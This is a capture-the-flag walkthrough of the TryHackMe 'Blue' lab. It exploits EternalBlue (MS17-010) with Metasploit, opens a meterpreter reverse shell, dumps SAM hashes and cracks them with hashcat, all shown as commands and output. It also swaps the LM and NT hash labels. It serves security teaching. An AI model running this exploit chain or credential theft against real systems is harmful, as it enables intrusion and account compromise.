TryHackMe - Blue Room
Before we begin, you can access this room by creating an account with tryhackme.com and browsing this link to join it, or by simply searching for “Blue” under the Hacktivities tab.
Scanning & Enumeration
Running nmap
nmap -sV -sC -oA nmap/top1000 10.10.196.230 -vv
There are quite a few interesting ports open on this box, among which:
- 3389 - RDP
- 445/139 - SMB
- 135 - RPC
From the nmap scan, we now know:
- the target is a Windows 7 Professional 7601 Service Pack 1 machine
- the NETBIOS name is JON-PC
- the machine is in a WORKGROUP
- it is most likely still vulnerable to EternalBlue
For more info on EternalBlue (MS17-010) I suggest starting here.
Running enum4linux
Trying to enumerate SMB with enum4linux will not help in this case: the permissions are set properly and we get access denied errors.
We can't enumerate SMB with smbclient either, as the administrator account is disabled and anonymous access does not appear to be enabled.
smbclient -L \\\\10.10.196.230 -U 'administrator'
Enter WORKGROUP\administrator's password:
session setup failed: NT_STATUS_ACCOUNT_DISABLED
smbclient -L \\\\10.10.196.230 -U 'anonymous'
Enter WORKGROUP\anonymous's password:
session setup failed: NT_STATUS_LOGON_FAILURE
smbclient -L \\\\10.10.196.230 -U 'jon'
Enter WORKGROUP\test123's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Let’s fire up our metasploit console and search for an exploit.

Gaining Access
Let’s use auxiliary/scanner/smb/smb_ms17_010 to scan the machine first and confirm it is vulnerable.
msf5 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 10.10.196.230 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.196.230:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.196.230:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed.
Vulnerable as we expected. Let’s try exploiting it:
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.0.110 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.196.230
RHOSTS => 10.10.196.230
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0
Running the exploit:
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.X.X.X:4444
[*] 10.10.196.230:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.196.230:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.196.230:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.196.230:445 - Connecting to target for exploitation.
[+] 10.10.196.230:445 - Connection established for exploitation.
[+] 10.10.196.230:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.196.230:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.196.230:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.196.230:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.196.230:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.196.230:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.196.230:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.196.230:445 - Sending all but last fragment of exploit packet
[*] 10.10.196.230:445 - Starting non-paged pool grooming
[+] 10.10.196.230:445 - Sending SMBv2 buffers
[+] 10.10.196.230:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.196.230:445 - Sending final SMBv2 buffers.
[*] 10.10.196.230:445 - Sending last fragment of exploit packet!
[*] 10.10.196.230:445 - Receiving response from exploit packet
[+] 10.10.196.230:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.196.230:445 - Sending egg to corrupted connection.
[*] 10.10.196.230:445 - Triggering free of corrupted buffer.
[*] Sending stage (201283 bytes) to 10.10.196.230
[*] Meterpreter session 1 opened (10.X.X.X:4444 -> 10.10.196.230:49220) at 2020-07-03 19:48:30 +0100
[+] 10.10.196.230:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.196.230:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.196.230:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
We are even logged in as SYSTEM:
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Since we already have the highest privileges and the exploit dropped us straight into a meterpreter session, there is no need to upgrade the shell. If you do need to upgrade a plain shell to meterpreter, the steps are:
- background your current shell with CTRL+Z
- list sessions by running sessions
- run sessions -u [session number] to upgrade that session to a meterpreter shell
For stability, I suggest always migrating from whatever process the exploit landed in to a long-lived native process with the same level of access as lsass, such as spoolsv.exe:
meterpreter > migrate 720
[*] Migrating from 1296 to 720...
[*] Migration completed successfully.
where 720 is the process id of spoolsv.exe (find it with ps in meterpreter).
Dumping SAM Database Hashes
Now let's dump all the hashes and see if we can crack any. To do that, type hashdump in your meterpreter session.
Note that these hashes are stored in the SAM database file in C:\Windows\System32\config.
If we browse to that folder we also get a cool little flag :)
Directory of C:\Windows\System32\config
07/03/2020 01:06 PM <DIR> .
07/03/2020 01:06 PM <DIR> ..
12/12/2018 06:00 PM 28,672 BCD-Template
07/03/2020 01:15 PM 18,087,936 COMPONENTS
07/03/2020 01:35 PM 262,144 DEFAULT
03/17/2019 02:32 PM 34 flag2.txt
07/13/2009 09:34 PM <DIR> Journal
07/03/2020 01:34 PM <DIR> RegBack
07/03/2020 01:34 PM 262,144 SAM
07/03/2020 01:15 PM 262,144 SECURITY
07/03/2020 02:05 PM 40,632,320 SOFTWARE
07/03/2020 02:11 PM 12,582,912 SYSTEM
11/20/2010 09:41 PM <DIR> systemprofile
12/12/2018 06:03 PM <DIR> TxR
8 File(s) 72,118,306 bytes
6 Dir(s) 20,431,114,240 bytes free
Hash breakdown (note that Jon's hash has been replaced and is not the actual hash found on tryhackme; you will need to get that on your own):
Jon:1000:xrh3nzg5yiyflvr6n1kcnwo88kiv6umd:oye9bbtdpjfzxfllhtmp0s4gb0u62o7o:::
- Jon is the username;
- 1000 is the RID (the actual account number in AD; user accounts start at 1000. You can read more on that here);
- xrh3nzg5yiyflvr6n1kcnwo88kiv6umd is the NT hash;
- oye9bbtdpjfzxfllhtmp0s4gb0u62o7o is the LM hash.
You can read more on NT/LM here.
Using hashcat, let's find which hash mode we need to crack this hash:
man hashcat | grep -i NTLM
1000 = NTLM
5500 = NetNTLMv1-VANILLA / NetNTLMv1-ESS
5600 = NetNTLMv2
Looks like 1000 is our go-to. Shall we?
hashcat -m 1000 -a 0 -w 1 hash.txt /usr/share/wordlists/rockyou.txt --force
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NTLM
Hash.Target......: oye9bbtdpjfzxfllhtmp0s4gb0u62o7o
Time.Started.....: Fri Jul 3 20:33:14 2020, (4 secs)
Time.Estimated...: Fri Jul 3 20:33:18 2020, (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2140.9 kH/s (0.52ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10203136/14344385 (71.13%)
Rejected.........: 0/10203136 (0.00%)
Restore.Point....: 10199040/14344385 (71.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: alsinah -> alonsouriel
Note: hash.txt contains the entire NTLM hash including username and RID.
Finding the Flags
Now that we have cracked the password, let's find the flags.
The first one is at the root of the C: drive:
Directory of C:\
03/17/2019 02:27 PM 24 flag1.txt
07/13/2009 10:20 PM <DIR> PerfLogs
04/12/2011 03:28 AM <DIR> Program Files
03/17/2019 05:28 PM <DIR> Program Files (x86)
12/12/2018 10:13 PM <DIR> Users
03/17/2019 05:36 PM <DIR> Windows
1 File(s) 24 bytes
5 Dir(s) 20,431,089,664 bytes free
The second one is in the folder where the SAM database is stored, as shown earlier.
The third one is in Jon's Documents folder:
Directory of C:\Users\Jon\Documents
12/12/2018 10:49 PM <DIR> .
12/12/2018 10:49 PM <DIR> ..
03/17/2019 02:26 PM 37 flag3.txt
1 File(s) 37 bytes
2 Dir(s) 20,431,089,664 bytes free
To read each flag, use more flagx.txt, substituting the flag number (flag1.txt, flag2.txt, flag3.txt).
Special thanks to DarkStar7471 for this cool little room.